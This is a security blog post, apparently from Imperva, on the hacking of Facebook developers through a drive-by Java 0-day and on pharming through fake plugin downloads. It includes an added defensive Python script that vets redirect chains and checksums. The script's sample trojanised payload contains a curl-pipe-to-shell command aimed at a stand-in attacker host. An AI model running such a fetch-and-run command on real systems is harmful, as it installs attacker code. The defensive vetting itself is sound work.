Over the weekend, Facebook disclosed that several of its developers had been hacked. The stated infection vector was a drive-by malware exploit hidden on a mobile site the developers were using; the attack used a 0-day Java vulnerability to infect their machines. Below is an analysis of the attack, and of the lessons to be learned from such an incident, by Mr Shteiman, Senior Security Strategist at Imperva.
Phishing and Pharming “Like” Facebook
In a blog post a few months ago, we observed how hackers use social networking sites to build target lists for phishing scams. We even had an unfortunate example of how such a scam targeted the White House.
More recently, in October 2012, research by Deloitte found that 82% of CISOs see phishing and pharming as their greatest cyber security threat.
Modern Phishing
It is important to note that modern phishing and pharming techniques, and the malware infection vectors they deliver, are just as effective as more traditional threats such as SQL injection.
Pharming attacks can hit an organization by impersonating a software vendor, an open source project or a user forum, with the malicious code either hosted on the offending site or reached through a redirect from it.
For example, a pharming attack might:
Either compromise an existing site (a common practice) or build a site offering an open-source “plugin-for-something-great”, and make sure the download link redirects to malicious software.
Users who need that piece of software download the payload, or the attacker uses a browser 0-day to infect them directly from the page.
Infect.
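The defensive counterpart to the steps above, as an added example (this is not code from the original article or from Imperva): before a downloaded “plugin” is run, check that every hop of the download link stays on the vendor’s own domains over TLS, and that the artifact matches a checksum pinned from an out-of-band source. The hosts, redirect chains and payload bytes below are constructed for illustration; the pinned digest is computed from the constructed genuine payload only so that the script runs offline, whereas in practice it comes from the vendor’s published release notes or signed manifest.

```python
from __future__ import annotations

import hashlib
from urllib.parse import urlparse

# Vendor domains the organisation trusts for this download (assumption:
# example.org stands in for the real project; any subdomain of it is accepted).
TRUSTED_HOSTS = {"example.org"}

# Constructed sample payloads, not real software: the genuine plugin and a
# trojanised copy an attacker would substitute behind a redirected link.
GENUINE_PAYLOAD = b"#!/bin/sh\necho 'plugin-for-something-great 1.0'\n"
TAMPERED_PAYLOAD = b"#!/bin/sh\ncurl -s http://stage2.invalid/drop | sh\n"

# In practice this is the checksum the vendor publishes out of band. It is
# derived from the constructed genuine bytes here only so the example runs offline.
PINNED_SHA256 = hashlib.sha256(GENUINE_PAYLOAD).hexdigest()

# Constructed redirect chains, hop by hop, as a client would observe them.
GOOD_CHAIN = [
    "https://plugins.example.org/download/plugin.sh",
    "https://cdn.example.org/releases/plugin-1.0.sh",
]
PHARMED_CHAIN = [
    "https://plugins.example.org/download/plugin.sh",              # the page the user trusts
    "https://plugins-example.org.attacker.invalid/plugin-1.0.sh",  # where the altered link lands
]
DOWNGRADED_CHAIN = [
    "https://plugins.example.org/download/plugin.sh",
    "http://cdn.example.org/releases/plugin-1.0.sh",               # same vendor, TLS dropped
]


def is_trusted_host(url: str, trusted_hosts: set[str]) -> bool:
    """True if the URL's host is a trusted domain or a subdomain of one.

    A suffix match on the whole label ('.' + domain) is used so that a look-alike
    such as example.org.attacker.invalid is not accepted.
    """
    host = (urlparse(url).hostname or "").lower()
    return any(host == t or host.endswith("." + t) for t in trusted_hosts)


def check_redirect_chain(chain: list[str], trusted_hosts: set[str]) -> list[str]:
    """Flag every hop that leaves the trusted domains or falls back to plain HTTP."""
    findings = []
    for i, url in enumerate(chain):
        parsed = urlparse(url)
        if parsed.scheme != "https":
            findings.append(f"hop {i}: non-TLS scheme {parsed.scheme!r} in {url}")
        if not is_trusted_host(url, trusted_hosts):
            findings.append(f"hop {i}: untrusted host {parsed.hostname!r} in {url}")
    return findings


def verify_download(chain, payload, trusted_hosts=TRUSTED_HOSTS, pinned=PINNED_SHA256):
    """Combine both checks; an empty list means the download is acceptable to run."""
    findings = check_redirect_chain(chain, trusted_hosts)
    digest = hashlib.sha256(payload).hexdigest()
    if digest != pinned:
        findings.append(f"payload sha256 {digest[:12]}... != pinned {pinned[:12]}...")
    return findings


if __name__ == "__main__":
    for name, chain, payload in [
        ("genuine", GOOD_CHAIN, GENUINE_PAYLOAD),
        ("pharmed", PHARMED_CHAIN, TAMPERED_PAYLOAD),
        ("downgraded", DOWNGRADED_CHAIN, GENUINE_PAYLOAD),
    ]:
        findings = verify_download(chain, payload)
        print(f"{name}: {'OK' if not findings else 'REJECT'}")
        for finding in findings:
            print("  -", finding)
```

This covers only the download branch of the list: a drive-by 0-day that fires from the page itself bypasses any check on the artifact, which is why the article’s point about controlling data access matters regardless of how well downloads are vetted.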
The Facebook Incident and what we can learn from it
In Facebook’s case they claim no data loss, which is difficult to guarantee unless data access is regulated with proper controls and an audit trail of who reached what. Controlling data access in your organization is what allows an incident such as this to end without data loss: even when a malware 0-day cannot be prevented, the loss of data, and the deep hit to the business that follows it, can be.
Facebook is considered a young company employing brilliant minds who are very good at what they do, and as a technology-driven company most of its employees would be considered technology-aware. And yet a malware drive-by has caused a breach.